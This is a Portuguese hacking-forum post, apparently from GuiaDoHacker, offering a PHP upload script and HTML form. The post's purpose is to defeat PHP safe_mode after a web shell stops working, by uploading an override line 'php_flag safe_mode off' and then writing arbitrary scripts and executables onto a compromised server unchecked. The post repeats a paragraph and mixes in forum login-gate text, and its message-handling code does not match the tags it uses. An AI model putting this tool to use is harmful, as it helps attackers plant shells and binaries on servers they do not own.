Bom galera, temos uns problemas quando o adm ativa o SAFE, a shell para de funcionar e tudo. Porém como todos sabemos, o safe-mode fica é ativado ou desativado no arquivo php.ini ou no .htaccess.
Daí, nós podemos criar um novo arquivo
com a linha de código php_flag safe_mode off Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
e depois upamos ele, que ai ele vai substituir o original fazendo com que o safe-mode fique desativado.
sem mais delongas, aqui esta o codigo.
upload.php
upload.html
Daí, nós podemos criar um novo arquivo
com a linha de código php_flag safe_mode off Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
e depois upamos ele, que ai ele vai substituir o original fazendo com que o safe-mode fique desativado.
sem mais delongas, aqui esta o codigo.
upload.php
Código:
<? //$id = author: SheldonCooper $path = "./upload"; //sete seu caminho de uploads aqui //if (empty($_FILES['archive']['tmp_name'])) return_msg("[Fudeu]", "Arquivo não pode ser upado!"); $txt_extencion_array = array("txt","php","asp","pl","cgi","c","cpp","jsp","cfm","bat","htm","html","sql","cvs","css"); $bin_extencion_array = array("exe","","com","elf","avi","mpg","gif","jpg","jpeg","png","bmp","swf","doc","pdf","mp3"); //o vazio é para elfs linux que geralmente nao tem extencao. adiciona ai $file_uploaded_name = $_FILES['archive']['name']; $file_uploaded_size = $_FILES['archive']['size']; $file_uploaded_tmp_name = $_FILES['archive']['tmp_name']; $file_uploaded_extencion = end(explode(".",$file_uploaded_name)); $safemode = ini_get('safe_mode'); if($safemode == 1){ return_msg("[o/]","Sistema com safe_mode? Fdase isso não será mais um problema..."); //agora que são elas, LoL... if(in_array($file_uploaded_extencion,$txt_extencion_array)){ //eH um arquivo plain/text $file_uploaded_txt_content = file_get_contents($file_uploaded_tmp_name); if(file_exists($path."/".$file_uploaded_name) && !is_writable($path."/".$file_uploaded_name)) return_msg("[Fudeu]","Você não tem permissão para gerar um arquivo no servidor!<br>Verifique se a pasta especificada no source-code está com as devidas permissoes."); //ele verifica se existe e se pode sobreescreve-lo if(!$file_id = fopen($path."/".$file_uploaded_name, 'w')) return_msg("[Fudeu]","Erro ao tentar criar o arquivo."); if(!fwrite($file_id, $file_uploaded_txt_content)) return_msg("[Fudeu]","Erro ao tentar escrever no arquivo."); return_msg("[o/]","Upload de arquivo plain/text realizado com sucesso!"); fclose($file_id); } if(in_array($file_uploaded_extencion,$bin_extencion_array)){ //eH um arquivo binario/executavel $file_bin_id = fopen($file_uploaded_tmp_name, 'rb'); $file_uploaded_bin_content = fread($file_bin_id, $file_uploaded_size); if(file_exists($path."/".$file_uploaded_name) && !is_writable($path."/".$file_uploaded_name)) return_msg("[Fudeu]","Você não tem permissão para gerar um arquivo no servidor!<br>Verifique se a pasta especificada no source-code está com as devidas permissoes."); //ele verifica se existe e se pode sobreescreve-lo if(!$file_id = fopen($path."/".$file_uploaded_name, 'w')) return_msg("[Fudeu]","Erro ao tentar criar o arquivo."); if(!fwrite($file_id, $file_uploaded_bin_content)) return_msg("[Fudeu]","Erro ao tentar escrever no arquivo."); return_msg("[o/]","Upload de arquivo binario/executavel realizado com sucesso!"); fclose($file_id); } }else{ return_msg("[Burro]","Sistema sem safe_mode!"); if(!(move_uploaded_file($file_uploaded_tmp_name, $path."/".$file_uploaded_name))) return_msg("[-]","Erro no upload do arquivo!"); return_msg("[o/]","Upload de arquivo realizado com sucesso!"); } function return_msg($param1,$param2){ switch($param1){ case "[!]" : echo "<center><h3><tt><font color=red>[!]</font><font color=black> $param2</tt></h3></font></center>\n";break; case "[+]" : echo "<center><h3><tt><font color=red>[+]</font><font color=black> $param2</tt></h3></font></center>\n";break; case "[-]" : die("<center><h3><tt><font color=red>[-]</font><font color=black> $param2</tt></h3></font></center>\n");break; } } ?>
upload.html
Código:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Upload by SheldoCooper - GuiaDoHacker.com.br</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body bgcolor="#ffffff" text="#000000" link="#0000cc" vlink="551a8b" alink="#ff0000"> <table width="100%" border=0 cellspacing=0 cellpadding=1> <tr bgcolor=#ffffff> <td> <div align="center"><tT></tT></div> <h3 align="center"><font color="#FF0000">[!]</font> Upload</font> </h3> <form name="form2" method="post" action="upload.php" enctype="multipart/form-data"> <div align="center"> <table width="31%" border="0" cellpadding="0" cellspacing="0" bgcolor="#CCCCCC"> <tr> <td><div align="right">Arquivo: </div></td> <td> <input type="file" name="archive"> </td> </tr> <tr> <td> </td> <td> <input type="submit" name="Submit" value="Submit"> </td> </tr> </table> </div> </form> </body> </html>